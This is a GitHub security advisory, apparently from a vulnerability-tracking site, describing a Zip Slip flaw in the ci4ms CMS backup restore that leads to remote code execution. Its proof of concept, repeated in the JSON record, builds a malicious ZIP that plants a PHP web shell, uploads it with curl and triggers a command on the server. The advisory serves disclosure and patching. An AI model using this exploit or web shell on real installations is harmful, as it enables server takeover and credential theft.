GHSA-XP9F-PVVC-57P4

Vulnerability from github – Published: 2026-04-22 17:28 – Updated: 2026-05-08 19:55
VLAI?
Summary
CI4MS Backup::restore is vulnerable to Zip Slip leading to RCE
Details

Summary

ci4ms Backup::restore extracts user uploaded ZIP archives without validating entry names, allowing an authenticated backend user with the backup create permission to write files to arbitrary filesystem locations (Zip Slip) and achieve remote code execution by dropping a PHP file under the public web root.

Details

modules/Backup/Controllers/Backup.php:80-119 implements the restore action. The uploaded file is moved to WRITEPATH . 'uploads/', and if the extension is zip, ZipArchive::extractTo() is called directly without iterating entries to verify they resolve inside the destination:

public function restore()
{
    $valData = ([
        'backup_file' => ['label' => 'Backup File', 'rules' => 'uploaded[backup_file]|ext_in[backup_file,zip]'],
    ]);
    if ($this->validate($valData) == false) return redirect()->route('backup')->withInput()->with('errors', $this->validator->getErrors());
    $file = $this->request->getFile('backup_file');

    if ($file && $file->isValid() && ! $file->hasMoved()) {
        $newName    = $file->getRandomName();
        $uploadPath = WRITEPATH . 'uploads/';
        ...
        $filePath = WRITEPATH . 'uploads/' . $newName;
        $sqlPath  = $filePath;
        if ($ext === 'zip') {
            $zip = new \ZipArchive();
            if ($zip->open($filePath) === true) {
                $zip->extractTo($uploadPath);          // no entry-name validation
                $sqlPath = $uploadPath . $zip->getNameIndex(0);
                $zip->close();
                @unlink($filePath);
            }
        }
        ...
    }
}

A ZIP containing entries like ../../public/shell.php is extracted outside writable/uploads/ into directories served by PHP. The author validates entries correctly in modules/Methods/Controllers/Methods.php:165-175 with a realpath + regex loop; the same check is missing here.

Routing: modules/Backup/Config/Routes.php binds POST backend/backup/restore to Backup::restore with role=create, and modules/Backup/Config/BackupConfig.php adds backend/backup and backend/backup/* to csrfExcept, so the route accepts cross-site POSTs from an authenticated administrator's browser.

PoC

Build the archive:

python3 -c "
import zipfile
with zipfile.ZipFile('evil.zip','w') as z:
    z.writestr('../../public/shell.php', '<?php system(\$_GET[\"c\"]); ?>')
    z.writestr('dump.sql', 'SELECT 1;')
"

Submit it as a backup to restore:

curl -i -b 'ci4ms_session=<SESSION_ID>' \
  -F 'backup_file=@evil.zip' \
  https://target.example.com/backend/backup/restore

Trigger the shell:

curl 'https://target.example.com/shell.php?c=id'
# uid=33(www-data) gid=33(www-data) groups=33(www-data)

Impact

Any ci4ms account that can restore a backup can write arbitrary files under the application root and gain remote code execution on the server, fully compromising the installation, the database credentials stored in .env, and any content the site handles. Because the route is in the csrfExcept list, a logged-in administrator who visits a malicious page can be forced to perform the restore cross-site, turning this into drive-by RCE against site operators.

Severity ?
9.4 (Critical)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "ci4-cms-erp/ci4ms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.31.5.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41202"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-22T17:28:39Z",
    "nvd_published_at": "2026-05-07T04:16:27Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nci4ms Backup::restore extracts user uploaded ZIP archives without validating entry names, allowing an authenticated backend user with the backup create permission to write files to arbitrary filesystem locations (Zip Slip) and achieve remote code execution by dropping a PHP file under the public web root.\n\n### Details\nmodules/Backup/Controllers/Backup.php:80-119 implements the restore action. The uploaded file is moved to `WRITEPATH . \u0027uploads/\u0027`, and if the extension is `zip`, ZipArchive::extractTo() is called directly without iterating entries to verify they resolve inside the destination:\n\n```php\npublic function restore()\n{\n    $valData = ([\n        \u0027backup_file\u0027 =\u003e [\u0027label\u0027 =\u003e \u0027Backup File\u0027, \u0027rules\u0027 =\u003e \u0027uploaded[backup_file]|ext_in[backup_file,zip]\u0027],\n    ]);\n    if ($this-\u003evalidate($valData) == false) return redirect()-\u003eroute(\u0027backup\u0027)-\u003ewithInput()-\u003ewith(\u0027errors\u0027, $this-\u003evalidator-\u003egetErrors());\n    $file = $this-\u003erequest-\u003egetFile(\u0027backup_file\u0027);\n\n    if ($file \u0026\u0026 $file-\u003eisValid() \u0026\u0026 ! $file-\u003ehasMoved()) {\n        $newName    = $file-\u003egetRandomName();\n        $uploadPath = WRITEPATH . \u0027uploads/\u0027;\n        ...\n        $filePath = WRITEPATH . \u0027uploads/\u0027 . $newName;\n        $sqlPath  = $filePath;\n        if ($ext === \u0027zip\u0027) {\n            $zip = new \\ZipArchive();\n            if ($zip-\u003eopen($filePath) === true) {\n                $zip-\u003eextractTo($uploadPath);          // no entry-name validation\n                $sqlPath = $uploadPath . $zip-\u003egetNameIndex(0);\n                $zip-\u003eclose();\n                @unlink($filePath);\n            }\n        }\n        ...\n    }\n}\n```\n\nA ZIP containing entries like `../../public/shell.php` is extracted outside `writable/uploads/` into directories served by PHP. The author validates entries correctly in modules/Methods/Controllers/Methods.php:165-175 with a realpath + regex loop; the same check is missing here.\n\nRouting: modules/Backup/Config/Routes.php binds `POST backend/backup/restore` to Backup::restore with `role=create`, and modules/Backup/Config/BackupConfig.php adds `backend/backup` and `backend/backup/*` to `csrfExcept`, so the route accepts cross-site POSTs from an authenticated administrator\u0027s browser.\n\n### PoC\nBuild the archive:\n\n```python\npython3 -c \"\nimport zipfile\nwith zipfile.ZipFile(\u0027evil.zip\u0027,\u0027w\u0027) as z:\n    z.writestr(\u0027../../public/shell.php\u0027, \u0027\u003c?php system(\\$_GET[\\\"c\\\"]); ?\u003e\u0027)\n    z.writestr(\u0027dump.sql\u0027, \u0027SELECT 1;\u0027)\n\"\n```\n\nSubmit it as a backup to restore:\n\n```bash\ncurl -i -b \u0027ci4ms_session=\u003cSESSION_ID\u003e\u0027 \\\n  -F \u0027backup_file=@evil.zip\u0027 \\\n  https://target.example.com/backend/backup/restore\n```\n\nTrigger the shell:\n\n```bash\ncurl \u0027https://target.example.com/shell.php?c=id\u0027\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\n### Impact\nAny ci4ms account that can restore a backup can write arbitrary files under the application root and gain remote code execution on the server, fully compromising the installation, the database credentials stored in .env, and any content the site handles. Because the route is in the csrfExcept list, a logged-in administrator who visits a malicious page can be forced to perform the restore cross-site, turning this into drive-by RCE against site operators.",
  "id": "GHSA-xp9f-pvvc-57p4",
  "modified": "2026-05-08T19:55:21Z",
  "published": "2026-04-22T17:28:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-xp9f-pvvc-57p4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41202"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ci4-cms-erp/ci4ms"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "CI4MS Backup::restore is vulnerable to Zip Slip leading to RCE"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.